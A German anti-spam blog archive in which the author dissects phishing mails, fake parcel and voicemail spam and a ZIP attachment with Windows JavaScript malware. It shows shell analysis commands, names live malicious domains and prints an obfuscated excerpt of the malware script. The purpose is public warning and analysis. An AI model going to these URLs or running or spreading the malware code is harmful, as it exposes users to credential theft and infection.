Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Schadsoftware“

Kundenservice

Samstag, 13. Januar 2024

Abt.: Schlechtes Phishing 🎣️

Sehr geehrte Kunde,

ԝir muѕѕtеn Іhr Kоntо vоrѕоrgliϲh ѕреrrеn. Unѕеr Syѕtеm hаt fеѕtgеѕtеllt, ԁаѕѕ Siе unѕеr nеuеѕ Siϲhеrhеitѕzеrtifikаt niϲht аuf Іhrеm mоbilеn Enԁgеrät inѕtаlliеrt hаbеn. Вittе hоlеn Siе ԁiеѕ ѕϲhnеllѕtmögliϲh nаϲh, um Kоѕtеn für Siе zu vеrmеiԁеn. Nаϲh Аbѕϲhluѕѕ ԁеr Іnѕtаllаtiоn ԝirԁ Іhr Kоntо ԝiеԁеr frеigеѕϲhаltеt. WeiterWir bedanken uns bei Ihnen für Ihr Verständnis.

Mit freundlichen Grüßen
Ihre Commerzbank
Impressum
Datenschutz
AGB
Disclaimer
Commerzbank 2023 © Alle Rechte vorbehalten

Oh, mit lustigen Unicode-Kringeln im Text. Das ist ja ganz sicher die richtige Commerzbank! Die kennt ja sogar meinen Namen und meine Kontonummer! 🤡️

Natürlich führt der Link nicht auf die Website der Commerzbank, sondern zunächst auf den Linkkürzer cutt.ly. Von dort…

$ location-cascade https://cutt.ly/VwH6pFtf
     1	http://ssss.imbakcanyon-borneo.com.my/comd/graphecon
     2	http://ssss.imbakcanyon-borneo.com.my/comd/graphecon/
$ surbl imbakcanyon-borneo.com.my
imbakcanyon-borneo.com.my	okay
$ mime-header http://ssss.imbakcanyon-borneo.com.my/comd/graphecon/ | sed 1q
HTTP/1.1 200 OK
$ lynx -dump http://ssss.imbakcanyon-borneo.com.my/comd/graphecon/
Sorry, your request has been denied.
$ _

…geht es weiter auf eine Seite, die zwar keinen Fehlercode 403 für eine Zugriffsverweigerung an den Webbrowser zurückgibt, aber dafür dem Leser eine lustige Fehlermeldung als „Seiteninhalt“ anzeigt. Zumindest, wenn der Leser einen Webbrowser verwendet, der nicht ganz so einfach von Kriminellen feindlich übernommen werden kann. Ich habe mal einen Firefox in einer virtuellen Maschine¹ benutzt, und schon leitet die gleiche Seite hierher weiter:

Screenshot der Phishing-Website. Es wird dazu aufgefordert, einen QR-Code mit dem Handy zu scannen

Solche Tricksereien aus der Phishinghölle hat natürlich nur nötig, wer ganz üble Absichten hat und deshalb mit allen Mitteln jede Analyse erschweren will. ⚠️

Wer den QR-Code – ich habe ihn hier mal unbrauchbar gemacht – mit seinem unter Android laufenden, so genannten „Smartphone“ scannt und nach Anleitung der Phisher das Giftzeug installiert, das die Phisher als angebliches „Zertifikat“ für die angebliche „Sicherheit“ anbieten, hat hinterher ein mit Schadsoftware übernommenes Handy anderer Leute in der Tasche. Der QR-Code führt zur Website in einer Domain…

$ surbl de-appupdate.com.de
de-appupdate.com.de	okay
$ surbl commerzbank.de-appupdate.com.de
commerzbank.de-appupdate.com.de	okay
$ _

…die zurzeit leider noch nicht auf den Blacklists steht, weil sie recht „frisch“ ist. Von den Sicherheitsfunktionen im Webbrowser wird man also nicht vor der üblen Gefahr gewarnt. Die Schadsoftware, die man von dieser betrügerischen Website herunterlädt, ist ebenfalls recht „frisch“ und wird zurzeit von den allermeisten Antivirusprogrammen noch nicht als Schadsoftware erkannt [Archivversion]. Wer sich auf sein Antivirusprogramm oder ein vergleichbares Schlangenöl verlässt, ist also einmal mehr völlig verlassen und wird zum Opfer der Kriminellen, während er sich „sicher fühlt“. Das gilt übrigens generell für jede halbwegs aktuelle Schadsoftware. Deshalb bezeichne ich diese ganze Softwaregattung ja auch als „Schlangenöl“. ☹️

Es gibt eben keine einfache, automatische Computersicherheit. Damit muss man leben. Vor allem, wenn man seine Fernkontoführung auf eigenes Risiko mit eigenen Geräten macht, nachdem einem die ganzen Kreditinstitute seit einem Vierteljahrhundert mit allerlei unanständigen Mitteln dazu drängeln und nötigen, natürlich ohne zusammen mit dem auf ihre Kunden abgewälzten Risiko die eingesparten Personalkosten an ihre Kunden weiterzugeben… 😙️

Aber zum Glück für uns alle gibt es gegen solche Machenschaften einen kostenlosen und hundertprozentig sicheren Schutz: Niemals in eine E-Mail klicken! Stattdessen für jede auch für Kriminelle interessante Website (Bank, Handelsplattform, soziales Netzwerk, Zahlungsdienstleister) ein Lesezeichen im Webbrowser anlegen und diese Websites nur noch über das Lesezeichen aufrufen. Dann kann einem ein Krimineller auch keinen giftigen Link mehr unterschieben, was immer noch die häufigste Form der Internetkriminalität ist. Wenn man die Website über das im Webbrowser angelegte Lesezeichen aufgerufen und sich dort wie gewohnt angemeldet hat und keinen Hinweis auf das angebliche Problem angezeigt bekommt, hat man einen dieser gefürchteten „Cyberangriffe“ abgewehrt. So einfach geht das. Und es ist völlig ohne Komfortverlust, denn es wird ja weiterhin nur geklickt. Nur eben nicht mehr in eine E-Mail. Macht das! 🛡️

Es kann nämlich schnell viele tausend Euro und teilweise jahrelangen Ärger einsparen. Mit dem Geld wird sicherlich jeder etwas Besseres anzufangen wissen, als so einem kriminellen Pack den verfeinerten Lebensstil zu finanzieren, und auf den ganzen Stress und Ärger wird wohl auch sicherlich jeder gern verzichten.

Also klickt bitte niemals in eine E-Mail! 🖱️🚫️

¹Links aus einer Spam immer nur mit der Kneifzange anfassen! Sie führen auf Websites, die von Kriminellen kontrolliert werden. Wer nicht weiß, wie man so etwas macht, sollte gar nicht erst darüber nachdenken. Das bisschen befriedigte Neugierde steht in keinem vernünftigen Verhältnis zum möglichen Schaden. Selbst der Firefox in der virtuellen Maschine, den ich für solche Dinge benutze, ist gut abgesichert. Man weiß ja nie. Die Verbrecher sind auf dem neuesten technischen Stand…

✔ 𝐅𝐮̈𝐫 𝐝𝐞𝐧 𝐕𝐞𝐫𝐬𝐚𝐧𝐝 𝐈𝐡𝐫𝐞𝐫 𝐁𝐞𝐬𝐭𝐞𝐥𝐥𝐮𝐧𝐠 𝐛𝐞𝐧𝐨̈𝐭𝐢𝐠𝐞𝐧 𝐰𝐢𝐫 𝐈𝐡𝐫𝐞 𝐁𝐞𝐬𝐭𝐚̈𝐭𝐢𝐠𝐮𝐧𝐠 📦 #𝗚257780164

Sonntag, 10. Dezember 2023

Hui, Unicode und Emoji im Betreff, das muss ganz was voll Wichtiges sein! 𝕯𝖆 𝖑𝖆𝖈𝖍𝖙 𝖒𝖆𝖓 𝖏𝖆 𝖘𝖈𝖍𝖔𝖓 𝖛𝖔𝖗 𝖉𝖊𝖒 𝕷𝖊𝖘𝖊𝖓!

Heute steht mal wieder fast die ganze „Mitteilung“ in einer tollen Grafik, die aus dem Web von einer Website in der Domain zrabike.info nachgeladen wird. Dazu später noch etwas mehr. Diese Domain, die zurzeit leider noch nicht auf den Blacklists steht, wird für nichts anderes als solche Spams benutzt und vermutlich in wenigen Tagen einfach weggeworfen. Für den Webhoster kann ich da nur hoffen, dass er Vorkasse genommen hat, denn nach der Aufgabe der Domain durch die asozialen Kriminellen wird er ganz sicher kein Geld mehr sehen. Da liegen noch viel mehr lustige Bilder.

Ach, erstmal zur Erheiterung die Spam:

Ihr nächster Code 𝗚𝟵𝟱𝟵𝟮𝟬𝟴𝟬𝟭𝟮

Lieferung -- Lieferung des ausgesetzten Pakets -- Foto eines Paketes -- Sie haben (1) Paket, das auf die Lieferung wartet. Verwenden Sie Ihren Code, um ihn zu verfolgen und zu erhalten. -- Planen Sie ihre Lieferung und abonnieren Sie unsere Kalenderbenachrichtigungen, um dies zu vermeiden passiert schon wieder! -- [Planen Sie Ihre Lieferung]

Na, da bin ich aber froh, dass ich heute nur ein ausgesetztes Paket erhalte und keine ausgesetzte Katze. So muss ich nur meinen Code verfolgen, damit ich ihn kriege. Und wenn ich das vermeiden will, passiert es schon wieder. 🤣️

Au mann! Noch ein, zwei Generationen unter dieser mit hohem Aufwand betriebenen Volksverblödung an den staatlichen Schulen der Bundesrepublik Deutschland mit ihren seit 22 fucking Jahren – das ist beinahe ein Vierteljahrhundert! – erschütternd schlechten Ergebnissen bei der PISA-Studie, und dann geht der Textversuch in dieser Grafik auch als gutes, gepflegtes Deutsch durch und nicht als dümmliches Gestammel eines Menschen, der sich bei der Verteilung der Intelligenz nicht vordrängeln mochte. Die wenigen Intellektuellen, die diese Vernichtsung ihrer Fähigkeiten durch die mit schärfsten Zwangsmitteln durchgesetzte Schulpflicht ohne bleibende Beschädigung ihrer Denkfähigkeit überstehen, werden sicherlich mit Leichtigkeit eine Sprache erlernen und für tiefere Mitteilungen verwenden, deren Ausdruckkraft über das dann endlich in der Hirnhölle der Kultusministerkonferenz entstandene Pidgin hinausgeht. Englisch zum Beispiel. Oder Chinesisch, die Sprache der großen, kommenden Weltkultur. Und den Dreisatz – woran bei der PISA-Studie ein gutes Drittel jener Menschen scheitert, die zum krönenden Abschluss ihrer Schulzeit eine Hochschulzugangsberechtigung erhalten – werden sie sich auch schon irgendwie beibringen. Als ich noch jung war, hat man sogar Sonderschülern den Dreisatz zugemutet, und sie waren damit überwiegend nicht überfordert. Ist ja auch ein einleuchtendes und praxistaugliches Stück Rechentechnik. Und damals war die Schule in der Bundesrepublik Deutschland schon so ein Halsthema und es gab Lehrermangel, große Klassen und Unterrichtsausfall. Daran etwas zu ändern, würde ja Geld kosten, das von den Parteienoligarchen lieber in andere Dinge gesteckt wurde und wird… 🤬️

Es fällt schwer, das nicht als politischen Willen zu erkennen, der einfach immer weiter vorangetrieben wird. Schon in zwei Monaten wird die jetzt durch die Medien getragene PISA-Studie wieder völlig vergessen sein, so wie bis jetzt noch jedes Jahr. Und dann wird einfach weitergemacht wie immer, und nur Idioten könnten ernsthaft erwarten, dass dabei etwas anderes, besseres herauskommt. Dumm konsumiert eben gut. Dumm kauft nämlich alles. Das sollen die Menschen werden: Verbraucher. Von Journalisten und vergleichbarem Geschmeiß werden sie ja schon seit verdammten Jahrzehnten jeden elenden Tag so genannt. Leute, denen man alles andrehen kann und deren gesellschaftliche Aufgabe es ist, zu arbeiten, um das alles kaufen und zu Müll machen zu können. Und die fehlenden „Fachkräfte“, die noch etwas draufhaben und auch zu Dingen imstande sind, die man nicht so leicht automatisieren kann (ich gebe dem Handwerk eine große Zukunft), holt man sich einfach durch Erweiterung der Europäischen Union. Das waren noch Zeiten, als Portugal das Armenhaus der Europäischen Union war!

Oh, ich schweife ab. Das wird mir irgendwann sicher wieder passieren, ich verspreche es. 😉️

Nun gut, ich sprach ja eben davon, dass auf diesem Server ganz viele lustige Grafiken gehostet werden. Das ist doch einen näheren Blick wert.

Aus den Biotopen des Internetsumpfes

Zeit für ein bisschen „Gymnastik“ an der Kommandozeile:

$ wget -m http://zrabike.info/images/
[… sehr lange Ausgabe von wget von mir abgeschnitten]
$ cat zrabike.info/images/* | wc -c
17471822
$ echo "17471822/1024/1024" | bc -l
16.66242790222167968750
$ _

Das ist ja mal eine fette Beute! Die Spammer waren zu faul, die Auflistung des Verzeichnisses im Apache mit einer einfachen Direktive abzuschalten, obwohl man dafür fast schon laientaugliche Anleitungen in diesem neumodischen Web findet, und so bin ich in weniger als einer Minute an etwas mehr als 16,6 MiB aktuelles Bildmaterial von Spammern gekommen. Das wäre ja auch viel zu mühsam, so einen Webserver auch ein bisschen zu konfigurieren, bevor man ihn benutzt. Wisst ihr ja: Wenn Spammer sich Mühe geben wollten, könnten sie gleich arbeiten gehen. 🛠️

Ich bin allerdings auch ziemlich faul. Ich könnte jetzt jedes dieser Bilder mit einem überlagerten „SPAM“ für Spammer unbrauchbar machen, um nicht zum Bildhoster für Kriminelle zu werden, und ich könnte das dann alles hier reinschaufeln, aber es sind…

$ ls zrabike.info/images/* | wc -l
172
$ _

…immerhin 172 Bilder. Diese alle von Hand zu bearbeiten, um sie hier zu veröffentlichen, würde mich unangemessen viele Stunden meiner Lebenszeit kosten. Ja, man könnte es auch an der Kommandozeile mit mogrify machen, und ich weiß auch, wie das geht – obwohl ich da auch nochmal in die man-page schauen müsste – aber da es sich in allen Aspekten um sehr verschiedene Bilder handelt, kann ich einfach nicht alles mit den gleichen Farben, den gleichen Schriftgrößen und den gleichen Einstellungen für die Überlagerung machen, so dass die Bilder auch wirklich für Spammer unbenutzbar werden. Deshalb picke ich mir hier nur ganz willkürlich und nach meinem schrägen Geschmack ein paar Beispiele heraus, die ich wie üblich von Hand bearbeite, um mal einen kleinen Einblick in das gesamte Geschäftsmodell dieser Bande zu geben, so weit es soeben für mich sichtbar geworden ist:

Beispiel 1: Das neueste Modell in französischer Sprache, aber nur teilweise übersetzt -- The Newest Model Yet steht noch in englischer Sprache.

Wir kennen das ja aus unserer Spam, allerdings in anhaltend schlechtem Deutsch. Das Französisch ist auch nicht viel besser. Avoir un cerveau ne suffit pas. Vous devez également l‘utiliser.

Beispiel 2: Das gleiche noch einmal in spanischer Sprache, aber vollständig übersetzt -- El Nuevo Modelo

Das Spanisch macht auf mich – ich habe es allerdings nie gelernt und verstehe es deshalb nicht so richtig – zumindest einen besseren Eindruck. Und es scheint vollständig übersetzt zu sein. Es gibt aber auch viel mehr Menschen, die Spanisch sprechen, als es Menschen gibt, die Deutsch oder Französisch sprechen.

Beispiel 3: Das gleiche noch einmal in dänischer oder norwegischer Sprache, nur beinahe vollständig übersetzt -- The Nyeste Modell

Das ist doch gleich ein bisschen lesbarer. Ich kann nicht entscheiden, ob es sich hier um Dänisch oder norwegische Bokmål handelt, weil das für mich im Schriftbild so unglaublich ähnlich aussieht und sich für mich genau mit den gleichen Schwierigkeiten liest, so verschieden es auch klingt. Aber wenigstens ist es kein Nynorsk, sonst hätte ich vermutlich nur Bahnhof verstanden. Obwohl „begrenztes Stiefelangebot“, so verstehe zumindest ich Begrenset Boots Tilbud, im Kontext auch etwas komisch wirkt. Aber so sind sie eben bei den „Neuesten Modellen“. 🤡️

Fürwahr ein internationales Geschäft! Aber das wird doch nicht das einzige Geschäftsfeld sein, oder? Ist es auch nicht:

Beispiel 4: Spanischsprachiger Hinweis, dass der Cloudspeicherplatz nicht mehr ausreicht und dass man für eine Erweiterung des Speicherplatzes klicken soll.

Nein, Trickbetrug – also Phishing – kann die Bande auch. Das sind doch genau die richtigen Leute, um ihnen einen Haufen persönlicher Daten für das „Neueste Modell“ zu geben, weil sie immer so schöne Mails für Gewinner schreiben! 🛑️

Habe ich Trickbetrug gesagt? Das reicht denen nicht.

Beispiel 5: Ein Bild mit dem Google-Logo und der Behauptung, dass Schadsoftware entdeckt wurde, nebst der Aufforderung, dass man für einen Sicherheitstest und weitere Anweisungen [!] klicken soll.

Die verteilen auch Schadsoftware, wenn noch jemand auf diese alten Nummern der Marke „Ganz viele Viren auf deinem Computer“ reinfällt. Tja, und nachdem man für einen Sicherheitstest geklickt hat und den weiteren Anweisungen [!] Folge geleistet hat, steht dann ein Computer anderer Leute auf dem Schreibtisch. Oder es steckt ein Handy anderer Leute in der Tasche. Diese anderen Leute freuen sich besonders, wenn sie damit kriminelle Geschäfte machen können, aber sind auch nicht unglücklich, wenn sie einfach nur das Bankkonto bis zur Dispogrenze leerräumen. Trickbetrug ist schön und gut, aber voll ausgewachsener Computerbetrug ist ungleich lukrativer.

Deshalb klickt man übrigens nicht in eine E-Mail. 🖱️🚫️

Und auch ein unerfreuliches Aussehen mit vielen Falten im Gesicht…

Beispiel 6: Ein Wundermittel, das Falten in nur 37 Sekunden beseitigt, einschließlich eines Photoshops von Vorher und Nachher.

…gehört nach nur 37 Sekunden der Vergangenheit an. Endlich kann man wieder wie ein Mensch aussehen, der niemals in seinem Leben gelacht hat!

Wo die Falten einfach weggezaubert werden…

Beispiel 7: Keto Gummies, die den Bauch wegmachen.

…kann man natürlich auch die Wampe weghexen. Mit magischen Fruchtgummis. Die man nur aus der Spam kennt. Aber von dort schon ziemlich lange. Unter ganz vielen verschiedenen Namen für den gleichen Betrug. Und wenn man dann endlich wieder schlank, faltenfrei, sexuell aktiv und attraktiv geworden ist…

Beispiel 8: Niederländische Spam für das Potenzmittel C+

…kann man sich auch die Pimmelpille aus der Spam einschmeißen, damit der kleine Lümmel auch schön steht. Wisst schon, mit optimiertem Testosteronspiegel für die maximale Manneskraft. Dieses Mittel namens C+, das mit Elfenblumenkraut, Yamswurzel, koreanischem Ginseng, Süßholzwurzel, Potenzholz und Austernschalenextrakten wirken soll, hatte ich hier ja schon öfter mal. Es wird nur über Spam vermarktet. Und es ist natürlich Quacksalberei.

Moment, wir hatten Datensammelei, Trickbetrug, Paketbetrug, Phishing, Schadsoftware, Pimmelpillen, Quacksalberei… was fehlt jetzt noch für die richtige Diversität des Spamgeschäftes? Richtig!

Beispiel 9: Werbung für das Casino TITAN SPINS mit 100 Freispielen für Neuspieler

Casino-Abzocke hat noch gefehlt. Ich finde das von den Spammern hierfür verwendete Bild aber nicht so gut gelungen. Ich schlage den Spammern ein viel besseres Bild für ihre nächsten Kampagnen vor:

Mit Stable Diffusion gerendertes Bild einer klassichen Slotmaschine, in deren Gehäuse völlig unübersehbar allerhand dämonisch anmutende Verzierungen eingearbeitet sind.

Da kann man den Spielern nur noch viel Glück wünschen! Die werden das brauchen. 🍀️

Moment, etwas fehlt hier doch noch… was kann das nur sein… was ist denn noch so eine tägliche Pest im Spameingang? Ach ja, richtig, Dating und die zugehörigen Fleischmärkte fehlen noch. Da gibt es ja immer ganz hübsche Bilder von ganz hübschen Frauen:

Beispiel 10: Ein erotisierendes Foto einer mit Unterwäsche bekleideten Frau mit tiefen Blick in die Brüste und einem Gesicht wie ein offenes Bett.

Beispiel 11: Ein ebenfalls sehr erotisierendes und leckeres Foto einer Frau.

Die schwarzen Balken über den Augen sind natürlich von mir. Diese Frauen sind mit dem Missbrauch ihrer zugegebenermaßen leckeren Fotos durch Kriminelle wahrlich gestraft genug.

Wie gesagt, ich habe hier noch viel mehr davon. Die Auswahl und Bearbeitung von elf Bildern hat mich jetzt schon lange genug aufgehalten, und so ein bisschen Text musste ja auch noch drumherum. Vermutlich wird bei diesem Anblick jedem Menschen klar, dass so eine asoziale Spammerbande keine Form der Kriminalität auslässt. Wenn nicht: Einfach mal mit einem erwachsenen Menschen durchschnittlicher Lebenserfahrung reden! Mir ist das schon lange klar, aber es ist leider nur selten, dass die Verbrecher so stümperhaft verpatzen, dass ich es auch mal halbwegs wasserdicht belegen kann.

Die heutige Wanderung durch die gleichermaßen artenreichen wie hirnarmen Biotope des Internetsumpfes ist jedenfalls beendet.

Mit Stable Diffusion erzeugtes Bild einer Gruppe stark schlammverschmierter Frauen, die gutgelaunt durch einen schlammigen Graben gehen

Es war zwar ein kleines bisschen schmutzig, aber es hat dabei doch eine Menge Spaß gemacht. Und das ist ja die Hauptsache bei so einer Exkursion. 😗️

Die Bilder der Frauengruppen, die durch ein schlammiges Sumpfgebiet gehen, habe ich allesamt mit Stable Diffusion erzeugt, das gleiche gilt für das „satanische Geldspielgerät“ weiter oben. Es hat sich keine Frau dafür dreckig gemacht.

You have a voicemail

Freitag, 13. Oktober 2023

Das glaube ich kaum. Ich kenne niemanden, der so barbarisch wäre, mich mit allen Nachteilen eines solches Vorgehens – keine einfache Durchsuchbarkeit der Mitteilungen, aber zum Ausgleich eine riesige Datenmenge für wenig Information – vollzuquasseln, statt mir einfach ein paar Zeilen zu schreiben. Einmal ganz davon abgesehen…

Von: tamagothi.de <postmaster@capmatic.com>
An: gammelfleisch@tamagothi.de

…dass niemand, der bei Troste ist, ans Gammelfleisch mailen würde. Diese Mailadresse gibt es eigentlich nur als kleines Lockangebot für Spammer. Deshalb kann man sie auch so völlig barrierefrei mit dem schlechtesten Harvester aus meinem Impressum einsammeln. Und deshalb steht da auch „Kontaktadresse für unseriöse Geschäftsvorschläge“ drüber. 😉️

Es ist also eine ganz klare Spam. 🔍️

New voicemail message in mailbox
Date/Time: 10/12/2023 11:27:44 a.m.
From: +41 58 310 31 ■■
Duration: 0:31

Nur, um es klarzustellen:

  1. Mein Mailpostfach empfängt keine Sprachmitteilungen. Es empfängt Mail.
  2. Ich verwende auch keinen Anrufbeantworter, der mir eine Mail sendet.
  3. Die Telefonnummer, die mich da auf meiner Mailadresse anruft, kenne ich nicht. Ich empfehle, bei solchen Anrufen auf einer privaten Nummer nicht einmal ans Telefon gehen, sondern die Leute auf den Anrufbeantworter reden zu lassen. Außer, man hat Lust auf Gewinnbimmler, Trickbetrüger und sonstiges Geschmeiß.
  4. Die Angabe von Datum und Uhrzeit im Text der Mail ist völlig überflüssig, denn sie steht ja schon im Mailheader und wird von der Mailsoftware angezeigt, und das sogar in meinem bevorzugten Format ohne „AM“ und „PM“ und mit dem Tag vor dem Monat. Es ist völlig sinnlos, so eine Angabe in den Text einer Mail aufzunehmen. Es hat für den Empfänger keinen Vorteil. Offenbar soll es nur technisch und wichtig aussehen, damit naive Empfänger beeindruckt werden.
  5. Den überflüssigen, unnötigen, beeindruckenwollend vielen Angaben, die sogar die Länge des Gequassels in Sekunden umfassen, steht eine interessante Auslassung gegenüber: Welche Telefonnummer wurde hier überhaupt angerufen? Es soll ja Menschen geben, die mehrere Nummern haben. Da die Absender davon ausgehen müssen, dass die Empfänger ihre eigene Telefonnummer kennen, können sie hier nicht irgendeine Quatschnummer angeben und bringen deshalb ganz viel unnützen anderen Quatsch, um darüber hinwegzuspielen.

Voicemail System.

Klar. Und ich bin der Papst. 🎅️

This is a private message. If you have received it by mistake or if you have any questions please contact your technical support

Das ist ja mal ganz was Neues, dass eine an einen einzelnen Empfänger gerichtete Mail eine private Nachricht ist! 🤭️

Und das war schon die ganze Spam. Also: Fast die ganze Spam. Bis auf einen Anhang, der da noch dranhängt und die Hauptsache bei dieser Spam ist. So ein leckerer Anhang! Es ist aber gar keine Audiodatei. Es handelt sich um eine höchst absonderliche HTML-Datei, die auf den meisten Betriebssystemen im Webbrowser geöffnet würde, und diese HTML-Datei ist mit 927 KiB auch „ein bisschen“ größer. Sie enthält nicht nur PHP-Code, der im Kontext einer lokal geöffenten HTML-Datei völlig sinnlos ist, sondern auch einen unfassbar aufgeblähten Wust von völlig unnötigen CSS-Formaten in einem langen Kommentar (sie werden also gar nicht verwendet) und kaum analysierbares Javascript, das zur Abwechslung allerdings mal wirklich ausgeführt wird. Dieser große Aufwand will aber gar nicht…

$ ls -lh voicemail.html 
-rw-rw-r– 1 elias elias 927K Okt 13 11:43 voicemail.html
$ file voicemail.html 
voicemail.html: PHP script, ASCII text, with very long lines (65135), with CRLF line terminators
$ lynx -dump voicemail.html 
Sign in

   to listen
   to your voice messages.
   [GPC5CsszENAwPCYrgM3QaB5EhArAQA7]
   ____________________
   ____________________
   (BUTTON) sign in
$ _

…zum scheinbaren und sehr kurz und trocken vorgetragenen Phishing passen und erweckt für mich den Eindruck, dass da hinter all diesen Obskuritäten auch Schadsoftware verteilt werden soll, wenn es beim Empfänger möglich ist. Wenn dieser Eindruck stimmen sollte: Wer sich auf sein Antivirusprogramm verlässt, ist verlassen. Zum Glück dürfte jeder so eine Spam als Spam erkennen und sofort löschen, zum Glück wird wohl niemand so einen Anhang öffnen… oder? Oder? 😱️

Entf! 🗑️

Antrag Nr: icb2355j

Freitag, 9. Juni 2023

Achtung! Nicht den Anhang öffnen! Es ist eine Spam. Der Anhang ist Schadsoftware für Microsoft Windows. 💀️

Von: Buchhaltung <contact@noorfes.com>
An: undisclosed-recipients: ;

Diese Mail geht an ganz viele Empfänger auf einmal. Schon bevor man hineinschaut, kann man erkennen, dass es sich um eine Spam handelt. Einen „Antrag“ sendet niemand in die halbe Welt. 😉️

Und dementsprechend unpersönlich ist auch der Text:

Gescannte Kopie der Zahlung

Vielen Dank für Ihr Vertrauen in unser Unternehmen.

Mit freundlichen Grüßen

Man braucht nicht viel lebenspraktische Intelligenz, um nach „Genuss“ dieser drei Zeilen die vielen Schwächen im Text wahrzunehmen:

  1. Es gibt keine Anrede.
  2. Es gibt keine Angaben über die angebliche „Zahlung“. Weder erfährt man einen Kontext, noch eine Höhe, noch eine Buchungsnummer, noch irgendwas.
  3. „Unser Unternehmen“ würde in einer echten Mail nicht darauf verzichten, seine Firmierung zu nennen, selbst wenn das Ergebnis sprachlich ein bisschen gekünstelt klänge.
  4. Unter der Grußformel fehlt ein Name. In der Regel stünde dort auch eine Telefonnummer für schnelle Rückfragen.
  5. Das für gewerbliche E-Mail obligatorische Impressum unter einer E-Mail ist nicht einfach nur unvollständig (was häufiger mal vorkommt), sondern fehlt völlig.

Kein Unternehmen, das an seinen Kunden hängt, würde so eine Mail schreiben. Na gut, der Azubi ist manchmal etwas unbeholfen, und irgendwann machen wir alle ein Ding zum ersten Mal und… ähm… dann auch mal nicht so gut, das ist schon wahr. Aber selbst der Azubi hätte bereits in einem mittelständischen Unternehmen eine Mailvorlage, in der die wichtigsten Dinge bereits enthalten sind, insbesondere das Impressum und ein grundlegendes Gerüst für eine Mail. Niemand tippt solche Dinge immer wieder von Hand, wenn es auch die Maschine kann. 🤖️

Und dass der Azubi so „unbeholfen“ sein sollte, dass er diese obligatorischen Angaben einfach gelöscht hätte, ist doch ein bisschen unwahrscheinlich. 🙃️

Der Text ist ja auch nur ein Köder. 🎣️

An der Mail hängt eine Datei scansa461.zip, die es in sich hat:

$ 7z l scansa461.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=de_DE.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz (306C3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 18318 bytes (18 KiB)

Listing archive: scansa461.zip

–
Path = scansa461.zip
Type = zip
Physical Size = 18318

   Date      Time    Attr         Size   Compressed  Name
——————- —– ———— ————  ————————
2023-06-09 08:11:22 ….A        49515        18160  scansa461.js
——————- —– ———— ————  ————————
2023-06-09 08:11:22              49515        18160  1 files
$ _

Ein ZIP-Archiv mit einer einzigen Datei, hier ein unter Microsoft Windows bei Doppelklick im Windows Script Host ausgeführtes Programm, ist immer gefährlich. Selbst, wenn so etwas an einer Mail hängt, die nicht fünf Meilen gegen den Wind nach der Spam von Kriminellen stinkt. Es handelt sich definitiv nicht um eine Rechnung, einen Antrag, eine Zahlung oder etwas Interessantes, sondern um ein Programm, das mit einer irreführenden E-Mail zugestellt wurde. Ein Doppelklick führt Software eines kriminellen Spammers aus. Auf dem Schreibtisch steht hinterher der Computer anderer Leute. Die Komprimierung soll eine Analyse durch Antivirusprogramme auf Seiten des Mailservers erschweren, und das funktioniert manchmal sogar. Wenn solche Anhänge auch im Jahr 2023 immer noch ohne vorherige Rückfrage beim Absender auf Empfängerseite doppelt geklickt werden, kann ich nur sagen: Dettelbach ist überall. ⚠️

$ 7z x scansa461.zip 

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=de_DE.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz (306C3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 18318 bytes (18 KiB)

Extracting archive: scansa461.zip
--
Path = scansa461.zip
Type = zip
Physical Size = 18318

Everything is Ok

Size:       49515
Compressed: 18318
$ file scansa461.js 
scansa461.js: ASCII text, with very long lines (49515), with no line terminators
$ cat scansa461.js | fold | sed 10q
var _0×4fa920=_0×41f3,_0×43fda2=_0×41f3,_0×537da8=_0×41f3,_0×5a242d=_0×41f3,_0×4
e77b9=_0×41f3,_0×257957=_0×41f3,_0×549c01=_0×41f3,_0×85e570=_0×41f3,_0×3b4543=_0
x41f3,_0×284e8a=_0×41f3,_0×3fe075=_0×41f3,_0×48dc30=_0×41f3,_0×1500a4=_0×41f3,_0
x465d99=_0×41f3,_0×373b4f=_0×41f3;function uniqueDecodeBase64(_0×131dca){var _0x
e5b8fe={_0×328141:'0×1ee',_0×5e139b:'0×1ef',_0×56b09c:'O4%k',_0×23b928:'0×1f0',_
0×1bb264:'Ke@A',_0×2f1565:'0×1f1',_0×4dfae9:'AdN8',_0×2f1b02:'0×1f2',_0×2cff74:'
i8pV',_0×3a957f:'0×1f3',_0×5e7964:'(^o5',_0xb4f799:'0×1f5',_0xd723f9:'0×1f6',_0x
346716:'0×1f7',_0×20ddcf:'dG5h',_0×58429d:'0×1f8',_0×38bcfa:'Ke@A',_0×1ef32d:'0x
1f9',_0×345937:'vA1Y',_0×1ac436:')tzE',_0×2eb532:'0×1fb',_0xca5079:'gr(R',_0×29f
4cb:'XZ^$',_0×182369:'0×1fd',_0×34d0a1:'c$l&',_0×262eed:'0×1fe',_0×1076d7:'yGBg'
$ _

Natürlich haben sich die Spammer alle Mühe gegeben, den angehängten Programmcode so unlesbar und kryptisch wie nur irgend möglich zu machen, um Analysen zu erschweren. Die Schadsoftware ist eine relativ neue Brut der Kriminellen, die zurzeit nur von rd. einem Fünftel der gängigen Antivirusprogramme als Schadsoftware erkannt wird. Wer sich auf sein Antivirusprogramm verlässt, ist also in vielen Fällen verlassen… wie leider so oft. 😕️

Wer hingegen so eine Spam als Spam erkennt und sofort löscht; wer niemals den Anhang einer E-Mail öffnet, ohne sich vorher über einen anderen Kanal als E-Mail zu vergewissern, dass dieser wirklich von einem vertrauenswürdigen Absender stammt oder wer digitale Signaturen in seiner gesamten Kommunikation verwendet und die Signaturen auch überprüft, ist vor solchen recht primitiven Angriffen sicher. Wie ich zu meinem Missfallen in den letzten Monaten immer wieder gelesen habe, sind viele Unternehmen und Institutionen nicht vor solchen Angriffen sicher, und dann gibt es wieder „Cyber Cyber“ in den Nachrichten, begleitet von den technisch völlig inkompetenten, wie heilloses Gehampel wirkenden Kommentaren aus Politik und Journalismus… ☹️

Dann gibt es eine Portion „digital first, Hochdruck second“. 😲️

